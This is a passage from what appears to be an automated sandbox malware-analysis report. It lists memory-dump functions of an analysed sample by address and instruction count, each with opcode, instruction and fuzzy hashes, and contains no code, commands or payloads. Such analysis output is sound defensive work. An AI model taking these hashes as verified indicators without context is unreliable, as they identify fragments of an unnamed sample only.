                                                • Opcode Fuzzy Hash: 7f16f59cd4841f83c92c0728fcb3c286cd3e9ed83b58350725e5afba930cb48d
                                                • Instruction Fuzzy Hash: AE116D71A0429A9FCF01DF69C884AEE7BF5FF49600B04446AE919D7721EB30D911CBA2
                                                Function 05465268 Relevance: .1, Instructions: 58COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 711b1286a5c57878dd6292cffc1bd1fdaf626b8f8aacc949f25e13fd990e9712
                                                • Instruction ID: 6d3b87239ec40d68e3cedae96bbc909f11764c0f895dfdc719ebc8028f6fbe8e
                                                • Opcode Fuzzy Hash: 711b1286a5c57878dd6292cffc1bd1fdaf626b8f8aacc949f25e13fd990e9712
                                                • Instruction Fuzzy Hash: 6F112E31B0065A8BCB54EBB9A8106EFB7F6BF89711B50407AC505E7344EF718D02CB91
                                                Function 0546CDD3 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e4fc2f0fb7bbd8794f6005eddecee044987e1aeb43a0deb8629cfe818f2c76f2
                                                • Instruction ID: 7cf17a1d1975e5245a9d193b68b96abfe4d205c2021ff1c164f17b6231d0825f
                                                • Opcode Fuzzy Hash: e4fc2f0fb7bbd8794f6005eddecee044987e1aeb43a0deb8629cfe818f2c76f2
                                                • Instruction Fuzzy Hash: 2711FE75E0020A9FCB45DFADC8409AEBFF1FF88310B10816AE918D7315D7309911CB90
                                                Function 0132D4BF Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2164124846.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_132d000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                • Instruction ID: 5e7662a57b39674a460f987002ba17f467078a9edbebbe0d9a03e94a9e1f9a87
                                                • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                • Instruction Fuzzy Hash: EE11DF76404280CFCB02DF54D5C0B16BF71FB84318F34C6A9D8090B256C33AD456CBA1
                                                Function 05465347 Relevance: .1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1fb67c02cc07f9ff45b57be01e17dbd5e65119accc7907d888cdb5775f3e9690
                                                • Instruction ID: 4abbd60ecab3fe6c9c543ede4678cd380ef95dafe66af0685e703043276f7a3d
                                                • Opcode Fuzzy Hash: 1fb67c02cc07f9ff45b57be01e17dbd5e65119accc7907d888cdb5775f3e9690
                                                • Instruction Fuzzy Hash: 2C018275A002164B8B25DA7A98849FFB7B7FBC4260725492AD419D3340DF708D058761
                                                Function 0133D1CF Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2164259410.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_133d000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                • Instruction ID: d00527f37aed1dc0eac6de3fb2c2ef8994922893cdc6206b67acd0306732cb19
                                                • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                • Instruction Fuzzy Hash: 0611BB75504280DFCB02CF54C5C0B15BBB1FB84228F24C6A9D8498B2A6C33AD40ACB61
                                                Function 05460429 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e2b73e3e149cd62ac63c9dd75e02b079998fc1ff6a1eefe91a81a84e11d14ce3
                                                • Instruction ID: 40f99bbc80cc3059754637be00ddd8f1e5744e49e7730c6880a0431d77acba96
                                                • Opcode Fuzzy Hash: e2b73e3e149cd62ac63c9dd75e02b079998fc1ff6a1eefe91a81a84e11d14ce3
                                                • Instruction Fuzzy Hash: 4811E5303042114FEB056B2994157EA3BE6EB95308F10856ED18DCF2C3CDFA68464BE1
                                                Function 0546CDE0 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a201f00af7c4fe2378a2edf3ae55c0a9222d1c935a9c499a3a2262b0bfb91652
                                                • Instruction ID: b1d44f093d89bec14228027b62ae288396ebc35e01ea221d2aa700e138e8dcdd
                                                • Opcode Fuzzy Hash: a201f00af7c4fe2378a2edf3ae55c0a9222d1c935a9c499a3a2262b0bfb91652
                                                • Instruction Fuzzy Hash: 56119BB5E0051A9F8B44DFADC9449AEFBF5FF8C310B10816AE919E7315E7309911CBA0
                                                Function 05461040 Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a00e4770e621273c9b9ee4370f8c05b457b46d82b094347e0e2ebe5f9451632b
                                                • Instruction ID: 95d349960f3d180b02afd6425560dfb045f7fa169b94f5cc072176831f8151ae
                                                • Opcode Fuzzy Hash: a00e4770e621273c9b9ee4370f8c05b457b46d82b094347e0e2ebe5f9451632b
                                                • Instruction Fuzzy Hash: 7E113C71A002599FCF11DF69C884AAE7BF5FF48610F00446AE919D7711EB31DA11CBA1
                                                Function 05460438 Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c7ff6b580bc5e73f98c8f350cbfa383a772422d9a38d6271d6312651f85b63e3
                                                • Instruction ID: 97d5a561be75ad358a5c8ebfba05334c5d48e806271e6f4eef687b8e0c371736
                                                • Opcode Fuzzy Hash: c7ff6b580bc5e73f98c8f350cbfa383a772422d9a38d6271d6312651f85b63e3
                                                • Instruction Fuzzy Hash: D501B5303443124BEB08BA69D41479A7AD6EB94718F10C62DD18DCF7C6CEFA68464BE1
                                                Function 05462F59 Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 06346cc47ddcd23c73736563a5bc1a010980be2fbf643a8d95127a8691b2816a
                                                • Instruction ID: 707052b67d58c312246865ae7b4c9d868b47c1ec5a161741eeb3c8acb3b4dae2
                                                • Opcode Fuzzy Hash: 06346cc47ddcd23c73736563a5bc1a010980be2fbf643a8d95127a8691b2816a
                                                • Instruction Fuzzy Hash: D701F1353082419FC718DB29D814E6BBBB6FFC6220B1485EED0468B365DBB0DC02CB91
                                                Function 05461A58 Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d2f8cd6bc2ed480a9805a9e73352f5fd7d3864e47c3571e5937abcf9cccbda34
                                                • Instruction ID: 74a766bd648d6dd8ffacac143b8e205052ec158191e9d4dc4c915f3fe899fe72
                                                • Opcode Fuzzy Hash: d2f8cd6bc2ed480a9805a9e73352f5fd7d3864e47c3571e5937abcf9cccbda34
                                                • Instruction Fuzzy Hash: 6901DF343043118FCB18A666D840AABB7AABFC4220B14D6BFC8068B254CF75DC42CB92
                                                Function 05461A68 Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 73140cf191d9ec1a0ff7915896876eea33756b4759bd64196098e6c4ad2a21a3
                                                • Instruction ID: 04ce399cef6b1d46c035ae06fb75ca0d4b484122f7357ed54798aec6f86da266
                                                • Opcode Fuzzy Hash: 73140cf191d9ec1a0ff7915896876eea33756b4759bd64196098e6c4ad2a21a3
                                                • Instruction Fuzzy Hash: 5A01A2343003158BCB18A66AC840B7B77AABFC0220724D66EC80687354DF74DC02CB92
                                                Function 0132D745 Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2164124846.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_132d000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b9b2fa2d8cc96cc4c1618b4ec120d5f7ed747d2bde952c4663f2c510cc474662
                                                • Instruction ID: a66f417cbc1a5e90882af58ef1716899ebca70d46cf381298bbaca2a7bc61135
                                                • Opcode Fuzzy Hash: b9b2fa2d8cc96cc4c1618b4ec120d5f7ed747d2bde952c4663f2c510cc474662
                                                • Instruction Fuzzy Hash: 27012B714043949AF7106EADCD84B66BF9CDF41328F08C51AEE094B282D77D9440C7B1
                                                Function 054619D0 Relevance: .0, Instructions: 44COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f3c67b369558b97f39f655999a61ceb26f93772ca5f910259add2c0b8318e510
                                                • Instruction ID: 9121bf2373afb75633b40d98bf14b74e8486a49fcd258419ad2f99b6be070f8e
                                                • Opcode Fuzzy Hash: f3c67b369558b97f39f655999a61ceb26f93772ca5f910259add2c0b8318e510
                                                • Instruction Fuzzy Hash: 8E017C38210710CFC714DB19D814E6AB7BABF85211B54D5ABD40AC7324CB75EC02CB51
                                                Function 054619D7 Relevance: .0, Instructions: 42COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 22fd4295a496f00cce60d8aa41e29787c5d99ee028c077ffdb35588a5584e5d4
                                                • Instruction ID: ff0555beec2f29fa080a3206b0b3e32e5deb89f1db845d14d304186d92d07d10
                                                • Opcode Fuzzy Hash: 22fd4295a496f00cce60d8aa41e29787c5d99ee028c077ffdb35588a5584e5d4
                                                • Instruction Fuzzy Hash: 54017C382043108FCB14DB69D814E6AB7A6FF85210B64D5BED406CB324CB71DC02CB91
                                                Function 05462F68 Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b2a2b1c646901975192e7957a98f381fd4c7c41a0f61e58eadf1a87433e72ae4
                                                • Instruction ID: 958c69cf8bb3de4818dcd03a30cd3f03e4c9344ee3ba7d53ea77c4378f6c488b
                                                • Opcode Fuzzy Hash: b2a2b1c646901975192e7957a98f381fd4c7c41a0f61e58eadf1a87433e72ae4
                                                • Instruction Fuzzy Hash: AF0162343142119FC718DA19D844E67B7A6FFC5220B10C5BED506C7354DBB5DC02CB51
                                                Function 054619E0 Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 480619f0ae58e4ace77b2bba9c08854cfc0ca3002f6a237b889a7d4c08874a2b
                                                • Instruction ID: aa16ebb18435554c66903bdbcefc3f747fc81fd921392b96f5e41ed5678c680d
                                                • Opcode Fuzzy Hash: 480619f0ae58e4ace77b2bba9c08854cfc0ca3002f6a237b889a7d4c08874a2b
                                                • Instruction Fuzzy Hash: 01014B382003108FC714DA29D844E6AB7AABF85210B24D5BED50AC7324DBB5EC02CB91
                                                Function 0546CD68 Relevance: .0, Instructions: 39COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5039b348424d3ce51ee237bcbc8c891202f00cc72321e57ad85322112ee03a5c
                                                • Instruction ID: 29d8655337c00341b02f8b94483c1804318d150ec9269d551dfc2aece274ee4d
                                                • Opcode Fuzzy Hash: 5039b348424d3ce51ee237bcbc8c891202f00cc72321e57ad85322112ee03a5c
                                                • Instruction Fuzzy Hash: 9CF0F431A206549FCB11EB6AD84489EFFB8EF8A70071041ABE64497221D730A945CBE2
                                                Function 0546EA8F Relevance: .0, Instructions: 39COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: df77ff4f830cfa420ee1dd7b04dd37fca7c3f610b4bad13eb35b52e6d87d414a
                                                • Instruction ID: 885d6dcf8ed66574c7ae1f60c796d52f4fc59aca1b7e5de5f69a6dbcac460455
                                                • Opcode Fuzzy Hash: df77ff4f830cfa420ee1dd7b04dd37fca7c3f610b4bad13eb35b52e6d87d414a
                                                • Instruction Fuzzy Hash: 68018F34E181989FCB25DF69D894EEEBFF6FF49314F148096E401E7361CA3198018B90
                                                Function 0132D744 Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2164124846.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_132d000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2ec967ef310406d62c9d04cb57452725e954118ad9586e3ecf4c83c3e1b683f2
                                                • Instruction ID: 8dae6c38a4476d96e76469079a6608467a9a8360c1ff9efe89f0ce9834cb9753
                                                • Opcode Fuzzy Hash: 2ec967ef310406d62c9d04cb57452725e954118ad9586e3ecf4c83c3e1b683f2
                                                • Instruction Fuzzy Hash: D5F062714053949AF7119E59D984B62FF98EB81738F18C45AED484B286C3799844CBB1
                                                Function 054606F0 Relevance: .0, Instructions: 35COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 057cba28ee48036c3708c7d870b7642a1552a54ed9bf162e9b2bc340e46ff05e
                                                • Instruction ID: 4f60692d1dbc51a712f37a980deb5c3ea1e4013ed32420c26c357b93d53639ec
                                                • Opcode Fuzzy Hash: 057cba28ee48036c3708c7d870b7642a1552a54ed9bf162e9b2bc340e46ff05e
                                                • Instruction Fuzzy Hash: A0F0AF318042098FDB90DF6DC8817ECBBB1FF00300F0485FAD059C7256EA389A46CB85
                                                Function 054606FC Relevance: .0, Instructions: 35COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a9a07970591b78f30dbcbb944cd3ed95b7b3f7b09b07d7f19d46b05179d88872
                                                • Instruction ID: f3d9ef93b44f1537d978d92deba1ed38e96d20ce6168dbd0961fead6a0b168af
                                                • Opcode Fuzzy Hash: a9a07970591b78f30dbcbb944cd3ed95b7b3f7b09b07d7f19d46b05179d88872
                                                • Instruction Fuzzy Hash: D9F06732D5020A9FDB90DFB8D8457BDBBE0FB04301F0489BAE818D3351EA389A15CB81
                                                Function 054658B8 Relevance: .0, Instructions: 34COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f197be9f0836af6fe2498c39af0a346fac4e31be52c0eedf47d18dbfec9f630c
                                                • Instruction ID: 6003a609af1a50cd7dc7bc9b7f8975d0d0b002e5f60e50d6a212a5d35bc6e0ce
                                                • Opcode Fuzzy Hash: f197be9f0836af6fe2498c39af0a346fac4e31be52c0eedf47d18dbfec9f630c
                                                • Instruction Fuzzy Hash: 5701EC70800219DFDB24DF55C4043EE7AF1BF44360F648666E415AA290D7744A44CF91
                                                Function 054658B3 Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cae4b59353783515c403fcaccb8b3b83db262b02b3c0c3c95c8a8b8aee416edd
                                                • Instruction ID: 39cef07d70f707337b31826d3f64c7ac58e544ebf314defa39dfcc1dd02779a1
                                                • Opcode Fuzzy Hash: cae4b59353783515c403fcaccb8b3b83db262b02b3c0c3c95c8a8b8aee416edd
                                                • Instruction Fuzzy Hash: C3012870C00219DEDB20DF69C4043EE7BF1FF08364F64866AE425AA290C7744A85CF91
                                                Function 0546DDE1 Relevance: .0, Instructions: 32COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4e64446437ed2aaa5da2e0ed7f0c461d02ff7e44f29914fd75beeb965f3c1009
                                                • Instruction ID: 9f8e8b3521157b3b83a79d66372ac8dfde876c377d198d8aeb949c82c3874021
                                                • Opcode Fuzzy Hash: 4e64446437ed2aaa5da2e0ed7f0c461d02ff7e44f29914fd75beeb965f3c1009
                                                • Instruction Fuzzy Hash: 81F06D35B001298FCB15EB99D845ADDB3F1FF9C721B1540A9E806BB360CB70AD41CB90
                                                Function 05464940 Relevance: .0, Instructions: 32COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7c6b7916380e4c08bfcaf647e1370dfb0cc44ad029a4472de3b3ffa5931108ac
                                                • Instruction ID: 1bb749f2b1c879cb549a5b69597d8fbd990efb017dfb6492777a1a3df194f6c4
                                                • Opcode Fuzzy Hash: 7c6b7916380e4c08bfcaf647e1370dfb0cc44ad029a4472de3b3ffa5931108ac
                                                • Instruction Fuzzy Hash: 99F06930A1020AEFCB04EBB8E44958CBFB5FB88304B1045A9D406AB241DE385E058B61
                                                Function 05465958 Relevance: .0, Instructions: 32COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3edea1b3632e4ace884cde85a923b3352424c8e38e4a5def557935720bdb6e93
                                                • Instruction ID: fbab75c2a6ac0fddb44b3b879e8243c9eae65bb610f2a33f8329fd5c0a1b18b3
                                                • Opcode Fuzzy Hash: 3edea1b3632e4ace884cde85a923b3352424c8e38e4a5def557935720bdb6e93
                                                • Instruction Fuzzy Hash: 0FE039727042286F9304EA6ED884D6BBBEEFBCD664311807AE508C7310DA319C01C6A0
                                                Function 05460530 Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 53eeffb5451655fd7b9755aaeadab8444b9ac659082551cddd4059671d825cbf
                                                • Instruction ID: b293209671da5b8086032e35e53f38ae327c46348fdb70c9f145dd02989c6c8d
                                                • Opcode Fuzzy Hash: 53eeffb5451655fd7b9755aaeadab8444b9ac659082551cddd4059671d825cbf
                                                • Instruction Fuzzy Hash: 46F0D4716147158F9B28CF18D482A9577E6FB0425872009AEE82ACF302D7B2E8038B85
                                                Function 0546EE28 Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f3e47928853bb32f61cb8084eecd0750b495be9c8e2035a5f929bd49e13e90f5
                                                • Instruction ID: e0d4993e20cd8d0e81ef3bf19998dd0dbe5a8fb3d359f9ad09bff4d83de5d204
                                                • Opcode Fuzzy Hash: f3e47928853bb32f61cb8084eecd0750b495be9c8e2035a5f929bd49e13e90f5
                                                • Instruction Fuzzy Hash: A0F09A30804288DFCB50DF74D0889EA3FF4EF06214B0080EBE448CA211E632C5AACB41
                                                Function 05463EEE Relevance: .0, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6eec71d5c0d760864bb37bbf8b29a7ab53d902abdd2454ed49553427812c69ae
                                                • Instruction ID: 4cad9abacf74ceb2dfa59014134bb0f1796c042eef39a2df0988bf09881b69b3
                                                • Opcode Fuzzy Hash: 6eec71d5c0d760864bb37bbf8b29a7ab53d902abdd2454ed49553427812c69ae
                                                • Instruction Fuzzy Hash: B9F01D31614044CFEB00DE59E4497E833B1FB4835AF4008AAD01A976A0CB39C986CB22
                                                Function 05465957 Relevance: .0, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fae5d769eb3b86f1035879c764b6c7d5d3d70ebf00dd9272e3dd0718c7e9f298
                                                • Instruction ID: 12e0cd996015bfe8031b35b14a5e46fc7ecb5b0b4931e66ebd8fde1505aa3f57
                                                • Opcode Fuzzy Hash: fae5d769eb3b86f1035879c764b6c7d5d3d70ebf00dd9272e3dd0718c7e9f298
                                                • Instruction Fuzzy Hash: FAE06DB6B002245F9304DAAED884E7BA7EEFBCC665315807AE508D7314DA318C01C7A0
                                                Function 0546493F Relevance: .0, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7d746d0e68b58c040f6b6d5f5e6fd6b995fc980366b338df05eb9423b19f940f
                                                • Instruction ID: fa2ccb18b0a404d51cb9fd4b251df3397fbce9422d0998fc0d9f0cf2cb493e01
                                                • Opcode Fuzzy Hash: 7d746d0e68b58c040f6b6d5f5e6fd6b995fc980366b338df05eb9423b19f940f
                                                • Instruction Fuzzy Hash: BEF0AF30A1028BDFCB19EBB8E44958C7F71FB85318B1046ADE416AB392CE391D02CB55
                                                Function 05460520 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e70b233b0126850f6cfac05b8092d953da948837fe1a6efc63f6f88fce0c7242
                                                • Instruction ID: f9ef69badc7a9cbe1ca21f4ea38d56b52ed222e1a2e57baa0e61d04330616391
                                                • Opcode Fuzzy Hash: e70b233b0126850f6cfac05b8092d953da948837fe1a6efc63f6f88fce0c7242
                                                • Instruction Fuzzy Hash: 19F0E5312483848FCB1AD778E4564D83FE1EB0621431509FFD486CF213D6A5D8038BC1
                                                Function 0546ED72 Relevance: .0, Instructions: 27COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
